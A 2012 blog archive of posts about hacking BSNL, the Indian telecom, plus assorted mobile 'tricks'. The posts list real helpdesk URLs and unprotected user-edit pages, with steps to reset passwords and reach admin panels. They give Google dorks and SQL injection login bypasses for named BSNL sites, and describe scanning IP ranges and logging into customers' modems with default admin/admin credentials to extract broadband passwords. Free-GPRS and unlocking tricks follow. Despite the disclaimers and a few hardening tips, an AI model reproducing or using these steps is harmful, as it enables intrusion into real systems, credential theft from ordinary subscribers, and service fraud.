Pages

Showing posts with label BSNL. Show all posts
Showing posts with label BSNL. Show all posts

Friday, April 13, 2012

Bsnl helpdesk application hacked

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Bsnl hosts a helpdesk application at :
http://dotsoft.bsnl.co.in/helpdesk
Doing a search on google for :
inurl:dotsoft.bsnl.co.in/helpdesk/moduser.asp
reveals around 225 links of users of the system.
Some urls are :
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jalnadotsoft
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=review
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=sdebhr
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBASOL
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=pramarao
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jmndba
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbcdotsoft
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=hacked%20by
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=aowl
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ramanap
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mbn
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=cpadma
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbatrich
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=chauhanak
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=BISHNOI
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbamr
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jrbarod
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gmtdjbp
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=htddba
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=htd
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=helpdesk
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=qwert12345
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=cjjoshi
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=APDBARTG
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=elrdba
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mramaiah
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=shalini
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gaurav
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ndshah
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DDNBSNL
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=s1ckyyyy
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=nskdotsoft
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=hitic
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=trp
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asmjrt_tra
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBAMRT
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=reetagreenday
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asrdotsoft
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mssrama
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBADKL
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbagulbarga
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=sanmalkani
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=robin
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asalgotra
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=avinash
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ngd
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ashu.yad111
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=nlr
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ubuntu
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=GOADBA
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gtr
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbafbd
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asmtez_tra
The link is meant to change the user details and should have been password protected. But they dont appear to be so. If any of the above urls work , then the password can be changed , and then the same password can be used to login in the application at this url http://dotsoft.bsnl.co.in/helpdesk/default.asp.
But this is just part of it. Doing a more generic search on Google will reveal even more remarkable results.
Doing a search for this url on google as follows :
inurl:dotsoft.bsnl.co.in/helpdesk
The above will show links of applications internal pages like “Problem Details” which are publicly visible and accessible. The vulnerable urls are publicly available on google search results as well.
Some links are :
http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=70322001&sby=decomp%20%20%20%20%20%20%20%20%20%20%20%20%20%20&sto=rajesh
http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=80524015&sby=dbcdotsoft%20%20%20%20%20%20%20%20%20%20&sto=wkgds
http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=90622012&sby=ddnbsnl%20%20%20%20%20%20%20%20%20%20%20%20%20&sto=kgr
http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=81220006&sby=ajdesai%20%20%20%20%20%20%20%20%20%20%20%20%20&sto=kgr
and so on.
Another important link found by random browsing is :
http://dotsoft.bsnl.co.in/helpdesk/viewreports.asp
It has links to various reports of the helpdesk application.
There is another helpdesk application being hosted at :
http://ap.bsnl.co.in/mishelpdesk/admin.asp
So searching for :
inurl:ap.bsnl.co.in/mishelpdesk
will reveal lots of url meant to be password protected.
But http://ap.bsnl.co.in/mishelpdesk/admin.asp is vulnerable to simple sql inject as well.
Simple enter any one of these following the password field :
‘ or ’1′=’1
‘ or ’1′=’1′ — ‘
‘ or ’1′=’1′ ({ ‘
‘ or ’1′=’1′ /* ‘
and you might get logged in.

Getting admin access on the application

1. First open any moduser link that works.
2. Now change password to “admin” and save.
3. Then login here http://dotsoft.bsnl.co.in/helpdesk/default.asp
You should see this page :

4. After logging in open this page http://dotsoft.bsnl.co.in/helpdesk/logadmin.asp
You should see admin options :

The application is in a pathetic condition. If you are a creative hacker then you may be able to hack out more from this system. Best of luck!!
Amazing stuff from Bsnl!!

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Hack Bsnl Broadband Accounts

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Bsnl DataOne Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a Bsnl Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.
First lets see how simple it is to hack bsnl dataone broadband usernames and passwords. For this you shall need a ipscanner tool called Angry IP Scanner http://www.angryziber.com/ipscan/ or anything similar.
Ok so lets begin…
Get your IP from :

www.ipmango.com

Step 1 :
Start Angry IP scanner and goto options > ports. Type in 80 in the first ports textbox and click ok.
Then goto options > options ; in the display section select “only open ports” and click ok&save.
Now on the main screen put in the ip scan range as something 59.*.0.0 – 59.*.255.255 (for e.g. 59.95.2.3) and click the start button. And the list that shall follow next are the victims. In this example we choose the range 59.95.0.0 – 59.95.255.255. You will be surprised at the number of victims you discover.
Step 2 :
Pick the ip-address of any of them and open up your browser and type in http://59.*.*.* (the * should be replaced by the values from the ip you are using. A box will popup asking for username and password. Enter the username : admin and password : admin .There is a high chance that you will be able to login with that username and password.
admin-admin is the default username and password that is set while manufacturing the adsl modem devices.
What follows next is the modem administration panel.
Simply search for the “WAN” option and click it. On the next page you will find the username and password of that user. now right-click on the page and click view source. in Mozilla/Opera This frame -> view frame source
Now in the source code search for this : INPUT TYPE=”PASSWORD”
and the value field of this input element will have the password
if its not there as in case of D-Link DSL 502T ADSL Routers the search for this
input type=”hidden” name=”connection0:pppoe:settings/password” value=”password” id=”uiPostPppoePassword”
and the value field will have the password
Well each steps take less than 1 minute so getting username passwords wont take even 2 minutes and is easier than sending a mail.
And this exposes the weak security of bsnl broadband users.
Well this is not a weakness but more of a mis-configuration which leads to insecurity. If you understand networking then you would probably realise that it was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search of victims who are absolutely ignorant of their weak security on the internet.
Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN(Internet) side. You would definitely want to make sure remote management is not active to protect yourself.
Note : On SmartAX MT880 eventhough Remote Management is disabled , it permits remote logins from over the Internet. So change your mode administration passwords immediately.
The problem is that the professionals at Bsnl are ignorant of such simplicity of networking and unable to advise the users or guide them to take proper security measures leaving their customers and themselves absolutely unsecure.
Now lets check a few more options related to this issue. A bsnl broadband modem can be used in two modes. RFC Bridged mode and pppoe mode.
In the RFC Bridged mode the device behaves like a modem device that is attached to your computer and you use some dialup software to dial into the isp through this modem.This is PPPOE from the PC and the adsl device is a good modem. This mode is safer as the username password are on your pc and nothing is on the modem.
In the PPPOE mode the adsl device becomes a router – a distinct network device with many features enabled. In this mode the username password is stored in the modem which will dial to the isp and establish the internet connectivity. The computers will just connect to this router who would be their primary gateway. Now this is the mode where the risk exists.
If remote administration is enabled the remote users from the internet can login to this modems administration panel. Now the main problem is the default admin username-password which most users dont change due to ignorance. “admin-admin” is pair that works in most cases giving you full access to the modems internals. What follows next is simple as drinking a glass of orange juice.
Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC not the “router” since the topology is like
(PC) -> router -> internet
So how should you secure yourself ?
1. Use RFC Bridged mode if it is sufficient for you.
2. Change the default admin password of your modem.
3. Disable wan ping reply . ( this will prevent the hackers from directly discovering your pc when it is on the internet)
4. Disable remote configuration feature.
5. Check your broadband usage on a regular basis and compare it with your own surfing schedules to check whether someone else has used it or not. If suspiscious usage is indicated then immediately change your bband password as well. Or a better suggestion would be to change broadband passwords on a regular basis.
Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.

Disclaimer : The information provided above is for educational purpose only. The main purpose of the author is to spread awareness amongst users. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Bsnl has implemented a technique called Port Binding, which will bind a particular username to its phone number. Then that username will only work via that phone number. Hence the above hacking method will become ineffective.
Port Binding is slowly being implemented by Bsnl over all cities and soon would cover the whole Broadband network across the country, making it more secure.

Hack BSNL websites easily

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Yes , we shall hack bsnl website easily , easy enough for a nursery kid. We shall be using Google Hacking and SQL Injection techniques.
So Lets begin.

Search this in google :
  
inurl:bsnl.co.in/admin

In the search results page go to second page. You would see plenty of links of the type :



Open that link and you will see lots of source code files.
Many of the links on this page show good information like :


Even an administration page is available without login :
http://billchn.bsnl.co.in/modifypassword.jsp

and here :

Check out what can be hacked from there.
So you hacked into bsnl servers and found some information that should be password protected. If you are a creative hacker then try getting into the system with a proper login.


Another google hack term :

site:bsnl.co.in inurl:admin

Search the above and you might get some more interesting links like :
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=admin
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_17&selected_faculty=DE+ADMIN
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=DE+ADMIN
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_5&selected_faculty=admin
The above links appear to be : should have been password protected but they are publicly visible.

Want to hack more ?

Search for this :
site:bsnl.co.in inurl:login
and you will find urls like :
all the above urls are vulnerable to sql injection. Enter the following as both username and password :
‘ or ’1′=’1
and you should be logged in. Happy Hacking!!
with username/password as :
‘ or ’1′=’1′ — ‘
Here is a screenshot :

Want to hack more ? Still not satisfied ? OK


Open this url :


and login with

‘ or ’1′=’1′ — ‘

as username and password , and you would be logged in as admin. Here is a screenshot :


Funny isn’t it ?

Want another website ? Sure :


Login with :

‘ or ’1′=’1′ — ‘

as the username and abcd as the password. You should get logged in and the Administration Panel should be available.

Here is a screenshot :

Well done once again Bsnl!!


References :

1. SQL Injection Tutorial : http://en.wikipedia.org/wiki/SQL_injection

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Friday, March 23, 2012

How to Use Any SIM in Any Modem Without Unlocking it

AIRTEL,BSNL,AIRCEL,VODAFONE MODEM UNLOCKER FOR FREE

Every One its not possible to use any sim in a modem without unlocking. For that you have to Pay. 
But dont worry with the following trick you can do it for free :-) 

Step by step instruction: 


1. Insert SIM in Modem 

mmmmmmmmmmmmmm 
mmmmmmmmmmmmmm 

2. Modem show invalid SIM, just ignore it and close modem software. 

3. Start NOKIA PC suite. 

4. Go to Nokia pc suite connect to internet option. 

mmmmmmmmmmmmmm 

5. Go to Configure. Select your data card modem,and make all operator apn setting as like when we use Nokia mobile connection. 
Eg:- Apn for Airtel – airtelgprs.com


mmmmmmmmmmmmmm 

6. Finish set up. 

7. Now connect to internet through PC suite. 

mmmmmmmmmmmmmm
8. Wow your net is connected without unlocking the modem.


Monday, February 13, 2012

Trace Mobile Phone Location And Service Provider Details In India

If someone is bothering by calling from an unknown mobile number or if you are getting unwanted missed calls from any specific mobile phone number, you should try trace the person using his number. Earlier mobile phone numbers were being kept confidential by mobile phone operators, but now you can use the first operator code to track or find mobile phone location. In this internet era, it’s very much possible to search, track or find a unknown missed call number details.
There are several web services that provide you the facility to enter a mobile number and trace it’s location. However, the output result comes incorrect many times as they don’t update their database regularly. Here is a detailed list to guide you with the sites that help users to find mobile phone number location online.


Find Mobile Phone Number Location Online

Trace Mobile : Trace Mobile is a free online telephone number location look up service where you have to just enter the 10 digit mobile phone number and it will display the mobile number informations such as operator, state etc.

India Cellular : This web service makes your job even more easier by allowing users to provide just the first four digits of the mobile phone number and then it searches it’s database to provide the correct operator, state informations.



India Trace : India trace allows users to trace a mobile phone number location by providing the 10 digit mobile number and hitting the Enter button. It shows the map of the state and tries to figure out the exact location of the mobile phone user. Additionally you get network informations, band type info etc.

SindhuNager : Sindhunager is a free online mobile number look up service where you can search across 34 crore Indian mobile numbers. It displays the operator name, operator signal and state name as the result.

Information Madness : This site has got a larger Indian mobile numbers database which covers all 8-series and 9-series Indian mobile numbers. Now you can find informations on missed calls from both 8 series and 9 series mobile numbers. Using this service, you can track both India and Pakistan mobile numbers.

HackTrix : This Indian mobile number look up service is in it’s beta stage and currently undergoing few developments. However, it provides the accurate and exact mobile number location using it’s pre-configured database.

Saturday, February 4, 2012

Setup Internet On BackTrack

Well many people face problem on backtrack and they ask the simple question how to enable internet on backtrack.
This is not so much handy and you can do this by your self just follow these easy steps to do so.


  
1) Open the terminal

2) type in: sudo ifconfig eth0 up 


3)Adding IP and netmask:
 
    sudo ifconfig eth0 [youripaddress] netmask [your netmask]

4) Adding the gateway:
 
    sudo route add default gw [your gateway] eth0

5) Adding the DNS server:
 
    sudo sh -c "echo nameserver [yourDNS]> /etc/resolv.conf"

6) To compile all the above entries
 
    sudo /etc/init.d/networking restart

7) To make the above setting default. If you skip this step you will have to configure your connection on every reboot. So to make the settings persistent:
 
     sudo update-rc.d networking defaults

8) Reboot:
 
    sudo reboot


And  you are done. Now you can use your internet connection.


Friday, January 13, 2012

Get free cricket alerts For all networks

Hi friends want to get free cricket alerts to your mobile phone for free?

then below is the solution
Free Cricket score every hour
Send CRI
to 9773300000.

After that,
send
ON to 9773300000.

100% working!


its is a service of google...
enj0y

BSNL International FREE Messaging


BSNL International FREE Messaging
Center No's for

Kerala
Maharashtra
Gujrath


+008074011229
+008074 011230


Try it!

BSNL Free GPRS






Looking for free GPRS trick?


first download the browser UCWEB or OPERA into your mobile phone
Now below is the settings which you have to edit manually

IP: 192.168.87.163


Port: 8080

Home page: wap.cellone.in


APN: cellone portal


Working is some states.,

Kindly post the working of the tricks in your state